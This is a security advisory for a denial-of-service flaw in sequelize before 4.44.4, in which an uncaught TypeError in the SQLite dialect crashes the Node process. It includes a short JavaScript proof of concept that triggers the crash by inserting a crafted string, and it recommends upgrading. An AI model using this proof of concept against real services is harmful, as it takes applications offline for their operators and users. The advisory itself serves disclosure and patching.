exploitDog
GHSA-fw4p-36j9-rrj3

Published: 3 Sep 2020
Source: github
GitHub: reviewed

Description

Denial of Service in sequelize

Versions of sequelize prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect does not catch the TypeError raised when the `results` variable is undefined and `.map` is called on it. An attacker who can submit input that reaches this code path forces the exception and crashes the Node process.

The following proof-of-concept crashes the Node process on a vulnerable version:

```javascript
const Sequelize = require('sequelize');

// SQLite dialect, file-backed database in the working directory.
const sequelize = new Sequelize({
  dialect: 'sqlite',
  storage: 'database.sqlite',
});

// The model is named TypeError in the original PoC; the name shadows the
// global TypeError within this script only and is unrelated to the exception.
const TypeError = sequelize.define('TypeError', {
  name: Sequelize.STRING,
});

TypeError.sync({ force: true }).then(() => {
  // Inserting this value triggers the uncaught TypeError in the SQLite
  // dialect and terminates the Node process.
  return TypeError.create({ name: 'SELECT tbl_name FROM sqlite_master' });
});
```

Recommendation

Upgrade to version 4.44.4 or later.

Packages

Name: sequelize (npm)
Affected versions: < 4.44.4
Fixed version: 4.44.4

Weaknesses

CWE-248 (Uncaught Exception)
